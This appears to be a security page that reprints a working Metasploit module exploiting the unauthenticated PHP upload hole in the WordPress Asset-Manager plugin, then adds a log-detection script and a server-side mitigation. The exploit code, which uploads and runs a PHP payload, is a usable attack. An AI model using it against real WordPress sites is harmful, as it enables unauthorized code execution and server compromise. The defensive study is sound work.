This module, taken from the Metasploit exploit library, targets a vulnerability found in the WordPress Asset-Manager plugin version 2.0 and below. The plugin allows PHP file uploads: a user can upload a file to a temporary directory without authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build a multipart/form-data body whose single part is named "Filedata",
    # the field name the plugin's upload.php reads the uploaded file from.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # upload.php echoes the stored file name back on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The file lands in the plugin's temp directory under wp-content/uploads,
    # which the web server serves directly, so a GET executes it.
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
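The module above leaves a distinctive two-request trace in the web server log: a POST to the plugin's upload.php followed by a GET of a .php file under wp-content/uploads/assets/temp/. The following detection script is an added example written for this page, not part of the Metasploit module or the plugin; it runs over constructed access-log lines in combined log format and flags any executed .php file in that temp directory, rating it higher when the same client posted to upload.php earlier.

```ruby
# Added example (not from the Metasploit module above): detection logic for the
# upload-then-execute sequence against the Asset-Manager plugin.

# Apache/nginx combined log format: client IP, request line, status code.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[[^\]]+\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/
UPLOAD_RE   = %r{/wp-content/plugins/asset-manager/upload\.php\z}i
TEMP_PHP_RE = %r{/wp-content/uploads/assets/temp/[^/]+\.php\z}i

# Scans log lines in order and returns one alert per GET of a .php file in the
# temp upload directory. Severity is 'high' when the same client POSTed to
# upload.php earlier in the log and 'medium' when the GET stands alone.
def detect_asset_manager_abuse(lines)
  uploaders = {}  # client IP => number of POSTs to upload.php seen so far
  alerts = []
  lines.each do |line|
    m = LOG_RE.match(line) or next
    path = m[:path].split('?').first  # drop any query string before matching
    if m[:method] == 'POST' && path =~ UPLOAD_RE
      uploaders[m[:ip]] = uploaders.fetch(m[:ip], 0) + 1
    elsif m[:method] == 'GET' && path =~ TEMP_PHP_RE
      alerts << {
        :ip       => m[:ip],
        :file     => File.basename(path),
        :status   => m[:status].to_i,
        :severity => uploaders.key?(m[:ip]) ? 'high' : 'medium'
      }
    end
  end
  alerts
end

# Constructed sample log lines (not real traffic). 203.0.113.7 performs the full
# upload-then-execute sequence; 198.51.100.9 fetches an image and a missing file.
SAMPLE_LOG = [
  '203.0.113.7 - - [26/May/2012:10:01:02 +0000] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [26/May/2012:10:01:05 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [26/May/2012:10:01:06 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzpa.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [26/May/2012:10:02:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/photo.jpg HTTP/1.1" 200 8311 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [26/May/2012:10:02:30 +0000] "GET /wordpress/wp-content/uploads/assets/temp/x.php?v=1 HTTP/1.1" 404 210 "-" "curl/7.2"'
]

if __FILE__ == $0
  detect_asset_manager_abuse(SAMPLE_LOG).each do |a|
    puts "[#{a[:severity]}] #{a[:ip]} requested #{a[:file]} (HTTP #{a[:status]})"
  end
end
```

A durable fix on the server side is the same check in reverse: deny execution of .php under wp-content/uploads entirely, so an upload that slips past the plugin still cannot run.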